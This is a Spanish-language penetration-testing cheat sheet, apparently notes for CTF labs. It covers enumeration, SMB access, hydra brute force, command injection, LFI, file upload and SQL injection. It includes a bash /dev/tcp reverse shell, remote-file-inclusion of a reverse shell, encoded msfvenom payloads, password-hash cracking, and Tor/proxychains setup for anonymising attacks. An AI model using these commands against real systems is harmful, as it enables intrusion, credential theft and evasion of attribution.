TRANSFERENCIA DE ARCHIVOS  
..........................

sudo python -m http.server 80
sudo python -m SimpleHTTPServer 80

TRATAMIENTO TTY
...............

LINUX
.....
   ------ option 1 -------
   script /dev/null -c bash
   ctrl+z
   stty raw -echo; fg
   reset xterm
   export TERM=xterm
   export SHELL=bash
   stty rows 52 columns 180

   ------ option 3 -------
   python3 -c 'import pty; pty.spawn("/bin/bash")'
   export TERM=screen-256color
   [Ctrl + z]
   echo $TERM
   stty raw -echo
   fg
   [INTRO]

ENUMERACION
...........

      DESCUBRIMIENTO DE HOSTS
      .......................
            
            arp-scan -I [interfaz] [rango IP] -g --> más recomendado!

            fping -a -g {Rango de IP}
                  -a: Este argumento indica que muestre solamente las ips que están activas en la red.
                  -g: Este argumento especifica que vamos a hacer el ping a un rango de ip.
         
            nmap -sn {Rango de IP}
                  -sn Este argumento indica a nmap que realice un escaneo de ping al rango de ip indicado.

            netdiscover -r {Rango de IP}
                  -r Este argumento indica que se va escanear un rango de ip.

     DESCUBRIMIENTO DE PUERTOS
     .........................

            sudo nmap -sS --min-rate 5000 -p- --open {IPs ej: 10.0.2.43,45,46...} -oN tcp_scan.txt
                   -sS Este argumento hace un escaneo SYN (no completa la conexion)
                   --min-rate Este argumento acelera el escaneo
                   -p- Este argumento escanea todos los puertos  
                   --open Este argumento muestra solo puertos abiertos
                   -oN Este argumento es para darle salida al escaneo en un archivo

            nmap -p22,80,443,445,... -sC -sV --open {IPs ej: 10.0.2.43,45,46...} -Pn -oN full_scan.txt
                   -sC: Indica que utilice unos scripts básicos de reconocimiento contra la IP.
                   -sV: Indica que muestre la versión que está funcionando en los puertos encontrados.
                   -Pn Indica que ignore la detección de host. Es útil cuando el host está filtrando o bloqueando el trafico ICMP. 

      ENUMERACION WEB
      ...............

            crtl+u => ver codigo fuente de la web
         
            sudo nano /etc/hosts => si la web no carga bien añadir referencia DNS ej: 10.10.10.10      blog.thm

            DNS
               dig axfr [dominio]
               nslookup

           whatweb -v http://url.com

            sslscan <ip> => permitirá anilizar el protocolo SSL/TLS que tiene configurado

            openssl s_client -connect [dominio]:443 --> ver certificados SSL

            wfuzz -c -t 400 --hc=404 -w [wordlist] [url]/FUZZ
            wfuzz -c -t 400 --hc=404 -w [wordlist] -w [archivo_extensiones] [url]/FUZZ.FUZ2Z
            wfuzz -c -t 400 --hc=404 -z range,0-100 http://IP/note.php?note=FUZZ --> probar numeros del 0 al 100

            ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349 --> Searching for LFI
            ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists" --> Username enumeration with ffuf
            ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "host:FUZZ.empline.thm" -u 'http://empline.thm/' -fs 14058 --> escaneo de subdominios

            dirb http://IP /path/to/wordlist

            dirsearch -u http://[IP]/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150 -e php,txt,html -f
            dirb http://[IP]/ -u user:password => Si para acceder al sitio web salta un cuadro emergente pidiendo credenciales y las conocemos, para fuzzear esa parte a la que accedemos despues del login:

            DIRBUSTER
                  1 - Poner target: http://10.10.10.10
                  2 - Poner Diccionario: /usr/share/wordlists/dirbuster/directory-list/lowercase-2-3-medium.txt

            gobuster dir -u "ip" -w /usr/share/wordlist/rockyou.txt -t 30
                  -u: Este argumento indica la IP/URL a analizar.
                  -w: Este argumento indica el directorio donde se encuentra el diccionario.
                  -t: Este argumento indica los hilos a los que se va a hacer el descubrimiento. Mientras más hilos, más ruido creas en la red y menos preciso es el escaneo
            gobuster -u "ip" -w /usr/share/wordlist/rockyou.txt -t 30 -x .txt,.php.js
                  -x: Este argumento indica las extensiones que se quieren analizar.

            wpscan --url http://web.com/carpeta => escaneo de web "wordpress" con plugins incluidos y versiones  

            joomscan -u [URL]
            https://github.com/SamJoan/droopescan

            magescan.phar scan:all [URL]
            https://github.com/steverobbins/magescan

            zaaproxy

            burpsuite  


      PUERTO 80
      .........

            1 - Revisa toda la página y el código fuente.
            2 - Lee cada página, revisa posibles emails, usuarios, información, etc.
            3 - Una vez encontrada la versión del sistema, busca en Google información acerca del servicio, busca exploits, CVEs, cualquier información que te permita determinar si la versión es vulnerable.
            4 - Utiliza whatweb o Wappalyzer para encontrar información sobre la aplicación web.
            5 - Realiza descubrimiento de directorios y de archivos.

      BUSCAR VULNERABILIDADES
      .......................

            nikto --url http://web.com => Para vulenerabilidades WEB
            nikto -h scanme.nmap.org
            nikto -h https://nmap.org -ssl --> Si la web va por HTTPS
            nikto -h $TARGET -T 9 -Format txt -o scans/$TARGET-nikto-80-sqli --> Escanea en busca de vulnerabilidades SQLi

            nmap --script=servicio -p"Puerto" <IP> => Ej: nmap --script=ftp -p21 10.10.10.10

EXPLOTACION
...........

      PUERTO 445/SMB
      ..............

            LISTAR RECURSOS COMPARTIDOS
            ...........................

                  smbclient -L 10.10.10.10 -N
                        -L: Mostrar por consola los recursos compartidos.
                        -N: Nullsession
                  Para conectarse:
                        smbclient //IP/RECURSO -n                  
                        smbclient //10.10.10.10/directorio -U user => Acceso a carpeta si tenemos usuario y contraseña
                  Una vez dentro para descargar:
                        smb:\> => get: descarga un documento / mget: descarga todos los documentos
                        smbget -R smb://IP/recurso
                        prompt off

                  enum4linux 10.10.10.10 
                  enum4linux -a <IP address>

                  smbmap -H 10.10.10.10 => Enumerar carpetas Nullsession
                  smbmap -H 10.10.10.10 -u user -p password => Acceder carpetas si tenemos usuario y contraseña

                  crackmapexec smb 10.10.10.10 -u ' ' -p ' ' --shares => buscamos carpetas de nullsession
                        dejamos 1 espacio entre comillas simples para nullsession
                        -u: Usuario
                        -p: Password 
                  crackmapexec smb 10.10.10.10 -u 'user' -p 'password.txt' => ataque de diccionario a un usuario determinado

      EXPLOTACION WEB
      ...............

            FUERZA BRUTA WEB
            ................

                  wpscan -U admin -P /usr/share/wordlist/rockyou.txt --url http://web.com/carpeta => ataque de diccionario al panel de login de wordpress

                  hydra –l <user> -P <diccionario> <IP> <servicio>
                  hydra -L user.txt -P /usr/share/wordlists/rockyou.txt [IP] http-post-form "[URL]:[TOKEN-URL]:Login failed"
                     Ej: hydra -L /home/kali/Downloads/users.txt -P /usr/share/wordlists/rockyou.txt 'http-get-form://10.10.134.16/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=050toadub7n33f96ehi7jo83o1; security=low:F=Username and/or password incorrect' 
                           hydra -l admin  -P /usr/share/wordlists/rockyou.txt 'http-get-form://10.10.26.170/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=2bq42nigi9klq2jdm13g3qa9h3; security=low:F=Username and/or password incorrect'
                     Ej: hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.10.188.51 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:The password you entered for the username"
                     Ej: hydra -L users.txt -P /usr/share/wordlists/rockyou.txt [IP] http-post-form '/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:S=302' --> Panel wordpress que no muestra error y redirecciona

                  Burpsuite
                     1 - Interceptar peticion
                     2 - Mandar al intruder   
                     3 - Seleccionar Payloads: Usuario o contraseña o los dos
                     4 - Elegir tipo de ataque   
                           Sniper attack: si conocemos usuario o contraseña
                           Cluster bomb attack: si no conocemos ni usuario ni contraseña
                     5 - Cargar lista de usuarios y contraseñas
                     6 - Start Attack

            COMMAND INJECTION
            .................

                  1 - Probar en la barra de busqueda el resultado esperado + ; o && o |
                  2 - Si se ejecutan comandos existe vulnerabilidad
                  3 - Poner en escucha el kali 
                        nc -lvnp 4444
                  4 - Poner en el buscador el valor esperado + revershell
                        bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
                  5 - Debe conectarse, si no probar sh, perl, o cualquier otra shell

            CSRF/CROSS SITE REQUEST FORGERY
            ...............................
                  
                  -  Esta vulnerabilidad aprovecha el cambio de contraseña. En la url aparece usuario y contraseña.  
                  -  El link se acorta y se envia a la victima
                  
            FILE INCLUSION
            ..............
   
                  - Si vemos /?page= y acaba en .php es posible que exista la vulnerabilidad
                  - Probar /etc/passwd => esto muestra los usuarios 
                           si no funciona poner /../../../../
                  - Si muestra el contenido es vulnerable
                           - Las webs se almacena en:
                              - LINUX: /var/www/
                              - WINDOWS: C:/inetpub/www

                  Se explota subiendo una reverse-shell.php se hace asi:

                  1 - Buscas una en internet ej: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
                  2 - Copias el codigo y creas un archivo 
                           sudo nano reverse.php => pegas el codigo copiado
                  3 - Cambias los parametros IP y PUERTO => pones IP de nuestra KALI y el puerto configurado
                  4 - Damos permisos de ejecucion
                           sudo chmod -x reverse.php
                  5 - Creamos un servidor para subir el archivo
                           python3 -m http.server 8080
                  6 - Ponemos en escucha nuestro KALI
                           nc -lvnp 4444
                  6 - Ponemos la direccion de mi servidor KALI en la url 
                           http://10.10.231.229/vulnerabilities/fi/?page=http//IPKALI:8080/reverse.php

            FILE UPLOAD
            ...........

                  Esta vulnerabilidad consiste en subir una reverse shell camuflada en un archivo esperado ej: .jpg .png etc

                  - Forma facil te deja directamente subir un archivo cualquiera. Ej: reverse.php => contiene una reverse shell
                  - Forma normal => se debe camuflar el archivo en lo esperado. Se hace asi:   
                        1 - Burpsuite => abrimos y configuramos para interceptar
                        2 - Subimos el archivo reverse.php e Interceptamos peticion
                        3 - Hay dos opcines posibles:
                              Cambiamos cabecera si el archivo es reverse.php
                                 -Content-type: image/png
                              Cambiamos extension si es reverse.jpg => esta camuflado la reverse
                        4 - Hacer fuzzing para buscar la carpeta upload y ejecutar la reverse shell

            SQL INJENCTION
            ..............
                  
                  Estructura Base de datos => BASE DE DATOS > TABLAS > COLUMNAS > CAMPOS > VALOR

                  Probamos si es Vulnerable con => ' o 'or '1'='1 => Si es vulnerable:

                  1 - Abrimos Burpsuite > configuramos > hacemos consulta 
                  2 - Guardamos consulta.req
                  3 - Lanzamos comando sqlmap
                        sqlmap -r consulta.req -p id --batch --dbs
                  4 - Si detecta las bases de datos vamos profundizando:
                        sqlmap -r consulta.rez -p id -D <base de datos> --tables
                        sqlmap -r consulta.rez -p id -D <base de datos> -T <Tabla> --columns
                        sqlmap -r consulta.rez -p id -D-D <base de datos> -T <Tabla> -C <Columna,Columna2...> --dump
                  5 - Podemos crackear los hashes con john siguiendo los pasos de sqlmap

            XSS/CROSS SITE SCRIPTING => Vulnerabilidad que acepta la entrada de codigo javascript
            ........................

                  REFLECTED => se muestra 1 vez el script sin almacenarse
                  STORED => se queda almacenado y todo el que visite puede ejecutarlo ej: entrada blog
                  
                      Probamos un script ej: <script>alert("HAS SIDO HACKEADO")</script>

      BUSCAR EXPLOIT
      ..............

            searchsploit wordpress mail masta 

      ENCODEAR PAYLOAD
      ................

            www.revshells.com => para generar comandos msfvenom
            msfvenom -p "payload" LHOST=10.10.10.10 LPORT=443 -f exe -o reverse.exe
            msfvenom -p windows/meterpreter/reverse_tcp LHOST=(Your IP Address) LPORT=(Your Port) -e x86/shikata-ga-nai -f exe > encoded.exe

      METASPLOIT
      ..........

            show => listar exploit, payload, auxiliary
            search => buscar exploit, payload, vulnerabilidad, etc
            use => seleccionar lo que queremos usar, ruta o numero
            show info => mostrar informacion de lo seleccinado
            set => configurar opcion
            setg => configurar globalmente la opcion durante la session
            run o exploit => activar el exploti o auxiliary

      PONER MI PC EN ESCUCHA
      ......................

            nc -lvnp 443

      CREAR DICCIONARIOS
      ..................

            crunch <min-len> <max-len> [<charset string>] [options]

      CRACKEAR HASHES
      ...............

            https://hashes.com/en/decrypt/hash
            https://hashcat.net/wiki/doku.php?id=example_hashes

            ssh2john id_rsa > hashes.txt => Pasar un id_rsa a hash para crackear el hash

            john --wordlist=/usr/share/wordlist/rockyou.txt hash.txt
            sudo john --format=[format] --wordlist=[path to wordlist] [path to file]
            john --list=formats => ver cifrados que admite john
            Borrar logs john --> rm ~/.john/john.*

            Si queremos juntar /etc/passwd y /etc/shadow para luego crackear...
                 unshadow passwd.txt shadow.txt > unshadow.txt
                 john unshadow.txt --wordlist=/usr/share/wordlists/rockyou.txt

                  
            hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
                  -m => tipo de hash
                  https://hashcat.net/wiki/doku.php?id=hashcat => flags de hashcat

     RDP
     ...

      xfreerdp /v:[IP] -sec-nla /u:"" -- Recon
      xfreerdp /u:[USER] /p:[PASS] /v:[IP] /cert-ignore -- Para conectarse por RDP a un equipo
      xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> /dynamic-resolution +clipboard

      rdesktop <RHOST>

      ncrack -vv --user user -P wordlist.txt [IP]:3389 -- Try cracking rdp login

      crowbar -b rdp -u user -C password_wordlist -s [IP] -v -- Other method to try cracking

ANONIMATO/TOR
.............

      INSTALACION TOR
      ...............

         sudo apt install tor
         sudo apt install tor torbrowser-launcher -y

      INICIAR SERVICIO TOR => iniciar cada vez que se reinicia
      ....................

         sudo service tor start
         sudo service tor status

      CONFIGURAR PROXYCHAINS => para dirigir nuestro trafico por Tor
      ......................

         sudo nano /etc/proxychains4.conf
               - Borramos # de #dynamic_chain
               - Ponemos # a strict_chain
               - Al final del archivo añadimos: socks5 127.0.0.1 9050
               - Reiniciamos equipo

         Si vamos a usar Metasploit añadimos la linea:
               localnet 127.0.0.1 000 255.255.255.255

      USAR PROXYCHAINS
      ................

         Se añade delante del comando de uso normal, el comando proxychains.
               Ej: proxychains nmap -vv dominio.com => Hacer scaneo nmap anonimo
               Ej: proxychains dirb <IP> <WORDLIST> => Hacer fuzzing anonimo
               Ej: proxychains firefox => navegar usando la red Tor
               Ej: proxychains nikto -h <IP>
               Ej: proxychains msfconsole


      FIREFOX ANONIMATO
      .................

         - Desactivar opcion "media.peerconnection.enabled" en about:config

      GOOGLE CHROME ANONIMATO
      .......................

         - Instalar extencion oficial google WebRTC Network Limiter. 

      EXTRA ANONIMATO
      ...............

         Modificar DNS de Google o OpenDNS
            sudo nano /etc/resolv.conf
               - http://servers.opennicproject.org/ => Usar 2 direcciones distinto Owner
               - https://blog.uncensoreddns.org/ => 91.239.100.100 y 89.233.43.71

         Usar VPN => NordVPN de las mejores
         

         
























